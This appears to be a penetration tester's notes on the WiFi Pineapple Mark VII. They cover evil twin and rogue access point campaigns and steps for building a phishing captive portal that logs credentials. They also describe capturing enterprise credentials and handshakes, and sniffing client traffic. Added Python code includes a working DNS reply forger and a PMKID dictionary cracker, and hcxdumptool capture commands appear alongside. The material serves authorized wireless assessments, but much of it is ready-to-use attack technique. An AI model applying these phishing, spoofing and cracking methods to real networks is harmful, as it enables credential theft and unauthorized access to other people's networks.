WiFi Pineapple Mark VII
Set up:
https://docs.hak5.org/wifi-pineapple/setup
Access via web:
Campaigns
A campaign automates one of the following types of engagement:
- Reconnaissance - Monitor Only
Passively monitor client device and access point activity within a defined region of the WiFi environment.
- Client Device Assessment - Passive
Identify client devices susceptible to basic rogue access points or evil twin attacks. Uses a passive PineAP mode to mimic access points only upon direct request. Depending on filter configuration, client devices may be allowed to associate with the WiFi Pineapple.
- Client Device Assessment - Active
Identify client devices susceptible to advanced rogue access points or evil twin attacks. Uses an active PineAP mode to broadcast an SSID pool, mimicking all access points listed. New access points may be dynamically added to the pool. Depending on filter configuration, client devices may be allowed to associate with the WiFi Pineapple.
Attacks
PineAP
When you design a campaign, you are telling PineAP how to behave.
Advanced options:
Impersonate APs: Explicitly advertise lists of access points to instigate clients into connecting to previously saved networks.
Open SSID
Serve a basic, unencrypted Open access point, or automatically impersonate any Open access point requested by a client.
- Basic Open Access Point
The basic Open access point can be configured as visible or hidden. A hidden access point does not advertise its SSID in its beacons, but clients which have saved the SSID will probe for it and still find it, and passive tools can recover the SSID from those probe and association frames.
- Multiple Open Access Points
When "Impersonate All Networks" is enabled, the WiFi Pineapple will answer for all SSIDs which are permitted by the filter configuration!
Filters can be used to tune the responses for your engagement, by either allowing all SSIDs in the filter list, or denying all SSIDs not in the filter list.
- Evil Portal Module
Set up an open AP with a login portal to perform phishing attacks, choose the desired template or upload a custom one.
To set up a custom captive portal: start from the Google template (https://github.com/kleo/evilportals/tree/master/portals), use a "save web page" browser extension to save the page you want to imitate, adapt the saved HTML to the template's PHP form handler so that submitted credentials are logged, then replace the template's index file from the Pineapple GUI instead of uploading a whole new folder.
Evil WPA AP
The Evil WPA access point is used to impersonate a WPA (or WPA2) PSK network. It can also be used to collect partial handshakes for use with external cracking tools when the PSK is not known.
Be sure to allow your Evil WPA SSID in your filter configuration, or clients will not be able to connect!
These half-handshakes (the client's message 2 of the 4-way handshake, carrying a MIC over nonces the Pineapple chose) are enough for hashcat to test candidate passphrases against the original network.
Evil Enterprise
Serve a WPA-Enterprise network with optional key exchange degradation. Coupled with automatic authorization of all accounts, identify misconfigured enterprise clients and capture credentials.
The RADIUS side presents a TLS (SSL) certificate, which must be created first.
Properly configured enterprise clients validate the server certificate and reject unknown ones; many devices, however, do not offer proper configuration and either accept a new certificate silently or prompt the user to accept it.
There are three authentication types:
- Any
Clients connecting with EAP-GTC connect as normal and their login is saved; clients connecting with EAP-MSCHAPv2 receive an error, but their MSCHAPv2 challenge and response are captured and logged.
- MSCHAPv2
The most common authentication method for enterprise clients. An MSCHAPv2 client proves knowledge of the password through a challenge/response over the NT hash, so the password itself is never sent.
An MSCHAPv2 client will not be able to fully connect to the WiFi Pineapple access point, but the challenge and response are captured and logged, and that pair can be attacked offline with a password cracker.
- GTC
Clients using GTC send the password in clear text inside the TLS tunnel, so the full username and password are disclosed; they connect to the WiFi Pineapple as normal and both are logged.
DNS Spoofing
Once we have clients connected to our malicious AP, we can forge DNS replies to send them to a site we control, using the DNSspoof module (https://github.com/90N45-d3v/DNSspoof-Pineapple-MK7-Module#preview).
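Added example of what a spoofed reply looks like on the wire; this is not the DNSspoof module's code. It builds the A-record query a victim's resolver would send, parses the question, and forges an answer that echoes the transaction ID and points the name at the Pineapple's own LAN address (172.16.42.1 is the MK7 default). Names outside the spoof table get no forged answer, so the real resolver's reply stands and the victim keeps working connectivity. The hostname and address in the table are constructed.

```python
import socket
import struct

# Hypothetical spoof table: names we hijack, pointed at the Pineapple's LAN address
# (172.16.42.1 is the MK7 default). Constructed for this example.
SPOOF_TABLE = {"login.example.com": "172.16.42.1"}


def build_query(qname, txid=0x1234):
    """Build an A-record query as a victim's stub resolver would (constructed input)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # flags: RD set; 1 question
    labels = b"".join(bytes([len(p)]) + p.encode("ascii") for p in qname.strip(".").split("."))
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_question(packet):
    """Return (txid, qname, qtype, qclass, offset_after_question) for the first question."""
    txid, _flags, qdcount = struct.unpack_from("!HHH", packet, 0)
    if qdcount < 1:
        raise ValueError("no question section")
    off, parts = 12, []
    while True:
        n = packet[off]
        off += 1
        if n == 0:
            break
        if n & 0xC0:
            # A compression pointer inside a question is abnormal; refuse rather than follow it
            raise ValueError("compressed name in question")
        parts.append(packet[off:off + n].decode("ascii"))
        off += n
    qtype, qclass = struct.unpack_from("!HH", packet, off)
    return txid, ".".join(parts), qtype, qclass, off + 4


def spoof_response(query, table=SPOOF_TABLE, ttl=300):
    """Forge a reply for a hijacked name: same txid, same question section, one A record.

    Returns None for names not in the table (or non-A queries) so the real resolver's
    answer stands; a spoofer that answers everything breaks the victim's connectivity
    and gets noticed immediately.
    """
    txid, qname, qtype, qclass, qend = parse_question(query)
    ip = table.get(qname.lower())
    if ip is None or qtype != 1 or qclass != 1:
        return None
    flags = 0x8180  # QR=1 (response), RD=1, RA=1, RCODE=0
    header = struct.pack("!HHHHHH", txid, flags, 1, 1, 0, 0)
    question = query[12:qend]
    # Answer name is a pointer (0xC00C) back to the question name at offset 12
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + answer


def answer_ips(packet):
    """Extract A-record addresses from a reply whose answer names are pointers (as ours are)."""
    _txid, _flags, _qd, ancount = struct.unpack_from("!HHHH", packet, 0)
    off = parse_question(packet)[4]
    ips = []
    for _ in range(ancount):
        _name, rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHHIH", packet, off)
        off += 12
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(packet[off:off + 4]))
        off += rdlen
    return ips


if __name__ == "__main__":
    q = build_query("login.example.com")
    print("spoofed answer:", answer_ips(spoof_response(q)))
    print("left alone:", spoof_response(build_query("www.hak5.org")))
```

On the Pineapple the same forged packet is sent back over UDP/53 to the client that asked, which works because the AP is the client's DHCP-assigned resolver and sees every query in the clear. DNS over HTTPS or DNS over TLS on the client bypasses this entirely, as do HSTS-preloaded sites that refuse to load from an unexpected certificate.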
MDK4 Toolkit
https://github.com/hak5/pineapple-modules/tree/master/mdk4
PMKID Attack
# Install the CA bundle first so opkg can fetch from the HTTPS package feeds, then refresh the package lists
opkg install ca-bundle ca-certificates
opkg update
# hcxdumptool requests EAPOL message 1 from nearby APs and records any PMKID they include in its RSN IE (no client needed)
opkg install hcxdumptool
# wlan1mon is the monitor-mode interface; --enable_status=1 prints live status (option names changed in newer hcxdumptool releases, check hcxdumptool -h)
hcxdumptool -i wlan1mon -o pmkids-capture.pcapng --enable_status=1
# Convert the capture to hashcat's 22000 format (one line per PMKID or EAPOL handshake) for offline cracking with hashcat -m 22000
hcxpcapngtool -o pmkids-capture.txt pmkids-capture.pcapng
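Added example, not from the page or from hcxtools/hashcat, of what the last step produces and why it can be attacked offline: it derives a PMKID the way a WPA2-PSK AP does, writes it as one hashcat 22000 line, and runs a dictionary attack against that line. The SSID, MAC addresses, passphrase and wordlist are constructed. The same 22000 container also carries EAPOL 4-way handshakes (type 02), which is what the Handshakes tab exports; those need the MIC check and are not handled here.

```python
import hashlib
import hmac

# Constructed target: a WPA2-PSK network and the AP/client MAC addresses seen in the capture.
# The passphrase is used only to build the sample line below.
SSID = "HomeNet"
MAC_AP = "001122334455"   # 12 lowercase hex digits, as hcxpcapngtool writes them
MAC_STA = "66778899aabb"
_SAMPLE_PASSPHRASE = "sunflower42"


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32)


def pmkid(pmk, mac_ap, mac_sta):
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): the RSN PMK-cache identifier an AP
    places in the RSN IE of EAPOL message 1, which is why no client has to be present."""
    data = b"PMK Name" + bytes.fromhex(mac_ap) + bytes.fromhex(mac_sta)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def to_22000(pmkid_bytes, mac_ap, mac_sta, ssid):
    """One PMKID entry in hashcat's 22000 container: WPA*01*PMKID*MAC_AP*MAC_STA*ESSIDhex***"""
    return "WPA*01*%s*%s*%s*%s***" % (pmkid_bytes.hex(), mac_ap, mac_sta, ssid.encode("utf-8").hex())


def parse_22000(line):
    """Split a 22000 line. Type 01 is a PMKID; type 02 is an EAPOL handshake (MIC-based) and
    is rejected here because it needs a different check."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA":
        raise ValueError("not a 22000 line")
    if fields[1] != "01":
        raise ValueError("type %s is not a PMKID entry" % fields[1])
    return {
        "pmkid": bytes.fromhex(fields[2]),
        "mac_ap": fields[3].lower(),
        "mac_sta": fields[4].lower(),
        "ssid": bytes.fromhex(fields[5]).decode("utf-8", "replace"),
    }


def crack_pmkid(line, wordlist):
    """Offline dictionary attack: one PBKDF2 (4096 SHA-1 rounds) and one HMAC per candidate."""
    target = parse_22000(line)
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:   # WPA passphrases are 8..63 characters; skip the rest
            continue
        pmk = pmk_from_passphrase(candidate, target["ssid"])
        if hmac.compare_digest(pmkid(pmk, target["mac_ap"], target["mac_sta"]), target["pmkid"]):
            return candidate
    return None


# Constructed sample line, equivalent to one line of pmkids-capture.txt from hcxpcapngtool
SAMPLE_LINE = to_22000(pmkid(pmk_from_passphrase(_SAMPLE_PASSPHRASE, SSID), MAC_AP, MAC_STA),
                       MAC_AP, MAC_STA, SSID)
WORDLIST = ["password", "12345678", "sunflower42", "letmein1"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered:", crack_pmkid(SAMPLE_LINE, WORDLIST))
```

The cost per candidate is dominated by PBKDF2, which is exactly what hashcat parallelises on GPUs. This only applies to PSK AKMs; with WPA3-SAE the PMKID comes out of the SAE exchange rather than from the passphrase, so a captured SAE PMKID cannot be attacked this way.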
Techniques
Control access with Filters
Limit the scope of an engagement with filters: allow only specific clients or SSIDs, or exclude specific clients or SSIDs.
Recon
- Main recon page
On the main Recon page, click on scan to start scanning.
You can search for Access Points or Clients by SSID, BSSID, or MAC address.
You can expand all clients automatically by going to the Recon Settings via the gear icon, and choosing "Expand all client lists"
Active Access Points and Clients can be automatically highlighted to make finding them easier by clicking on Recon Settings > Highlight Active Devices.
By clicking on an AP or Client in the list, a side menu will slide out, from where you can select options specific to the type of device you selected, such as capturing handshakes or cloning, or adding MAC addresses to the Filters.
- Tagged parameters
Tagged parameters are included in the beacon packets which advertise a WiFi network, and contain information about the encryption, channel selection, surrounding traffic, and more.
- Security Information
Simplified explanation of the security options employed by the network.
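Added example, not from the page or the Pineapple firmware, of how a simplified security summary like the Recon panel's can be derived from beacon tagged parameters: a constructed beacon body is split into tag/length/value elements, the SSID and DS-channel tags are read, and the RSN element (tag 48) is decoded into ciphers, AKMs and management-frame-protection bits. The sample frame, its SSID and its suite values are constructed; a truncated frame stops the parser cleanly instead of reading past the end.

```python
import struct

OUI_IEEE = b"\x00\x0f\xac"
CIPHER = {1: "WEP-40", 2: "TKIP", 4: "CCMP-128", 5: "WEP-104", 8: "GCMP-128", 9: "GCMP-256", 10: "CCMP-256"}
AKM = {1: "802.1X", 2: "PSK", 3: "FT-802.1X", 4: "FT-PSK", 5: "802.1X-SHA256",
       6: "PSK-SHA256", 8: "SAE", 9: "FT-SAE", 18: "OWE"}


def build_sample_beacon_body():
    """Constructed beacon frame body (no MAC header, no FCS): fixed fields, then tagged parameters.
    Models a WPA3/WPA2 transition-mode AP on channel 6."""
    fixed = struct.pack("<QHH", 0x1122334455667788, 100, 0x0411)  # timestamp, interval, capability (ESS+Privacy)
    ies = bytes([0, 7]) + b"HomeNet"                                # tag 0: SSID
    ies += bytes([1, 4, 0x82, 0x84, 0x8B, 0x96])                   # tag 1: supported rates
    ies += bytes([3, 1, 6])                                         # tag 3: DS parameter set (channel)
    rsn = struct.pack("<H", 1)                                      # RSN version
    rsn += OUI_IEEE + b"\x04"                                       # group cipher: CCMP-128
    rsn += struct.pack("<H", 1) + OUI_IEEE + b"\x04"                # 1 pairwise cipher: CCMP-128
    rsn += struct.pack("<H", 2) + OUI_IEEE + b"\x02" + OUI_IEEE + b"\x08"  # AKMs: PSK, SAE
    rsn += struct.pack("<H", 0x00C0)                                # RSN capabilities: MFPC | MFPR
    ies += bytes([48, len(rsn)]) + rsn                              # tag 48: RSN
    return fixed + ies


def parse_ies(body):
    """Split the tagged-parameter area into (tag, value) pairs; stop on a truncated element."""
    ies, off = [], 12  # skip timestamp(8) + beacon interval(2) + capability(2)
    while off + 2 <= len(body):
        tag, length = body[off], body[off + 1]
        value = body[off + 2:off + 2 + length]
        if len(value) < length:   # frame cut short: do not trust the remainder
            break
        ies.append((tag, value))
        off += 2 + length
    return ies


def suite_name(raw, table):
    if len(raw) < 4:
        return "truncated"
    if raw[:3] != OUI_IEEE:
        return "vendor-%s:%d" % (raw[:3].hex(), raw[3])
    return table.get(raw[3], "unknown-%d" % raw[3])


def parse_rsn(value):
    """Decode an RSN element: version, group cipher, pairwise ciphers, AKMs, capability bits."""
    version, = struct.unpack_from("<H", value, 0)
    group, off = suite_name(value[2:6], CIPHER), 6
    n, = struct.unpack_from("<H", value, off)
    off += 2
    pairwise = [suite_name(value[off + 4 * i:off + 4 * i + 4], CIPHER) for i in range(n)]
    off += 4 * n
    n, = struct.unpack_from("<H", value, off)
    off += 2
    akm = [suite_name(value[off + 4 * i:off + 4 * i + 4], AKM) for i in range(n)]
    off += 4 * n
    caps = struct.unpack_from("<H", value, off)[0] if off + 2 <= len(value) else 0
    return {"version": version, "group": group, "pairwise": pairwise, "akm": akm,
            "mfp_capable": bool(caps & 0x80), "mfp_required": bool(caps & 0x40)}


def summarize(body):
    """Simplified security information, the way a Recon-style panel would present it."""
    info = {"ssid": None, "channel": None, "security": "Open", "rsn": None}
    privacy = struct.unpack_from("<H", body, 10)[0] & 0x0010       # capability Privacy bit
    for tag, value in parse_ies(body):
        if tag == 0:
            info["ssid"] = value.decode("utf-8", "replace") if value else "<hidden>"
        elif tag == 3 and len(value) == 1:
            info["channel"] = value[0]
        elif tag == 48:
            info["rsn"] = parse_rsn(value)
    rsn = info["rsn"]
    if rsn:
        akm = rsn["akm"]
        if "SAE" in akm and "PSK" in akm:
            label = "WPA3/WPA2-PSK transition"
        elif "SAE" in akm:
            label = "WPA3-SAE"
        elif "OWE" in akm:
            label = "OWE (enhanced open)"
        elif any("802.1X" in a for a in akm):
            label = "WPA2-Enterprise"
        else:
            label = "WPA2-PSK"
        if "TKIP" in rsn["pairwise"]:
            label += " (TKIP allowed)"
        info["security"] = label
    elif privacy:
        info["security"] = "WEP or WPA1 (no RSN element)"   # WPA1 uses vendor tag 221, not decoded here
    return info


if __name__ == "__main__":
    print(summarize(build_sample_beacon_body()))
```

The transition-mode label is the detail worth noticing on an engagement: a network that advertises both PSK and SAE still accepts WPA2 clients, so its passphrase is exposed to the same handshake and PMKID attacks as a plain WPA2 network.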
Sniffing
Once we have clients connected to our malicious AP, we can sniff their network activity.
- tcpdump Module
Once we have clients connected to our malicious AP, open the Clients tab and note which interface the target client sits on (br-lan most of the time), then open the tcpdump tab and start a capture on that interface.
- HTTPeek Module
HTTPeek displays all images, URLs, cookies, and POST data that clients connected to the WiFi Pineapple send over plaintext HTTP; traffic inside HTTPS is not visible to it.
Handshakes
We can click on the Automatic Handshake Capture button or target a specific network for handshake capture by selecting the network, then selecting "Capture Handshakes" from the menu.
The Handshakes tab shows any captured handshakes. Handshakes are captured in PCAP and Hashcat's 22000 format.
Handshakes that list Recon Capture as the source show that they were captured during a Recon scan or a Recon handshake capture.
Handshakes captured from the Evil WPA AP show as Evil WPA/2 Twin.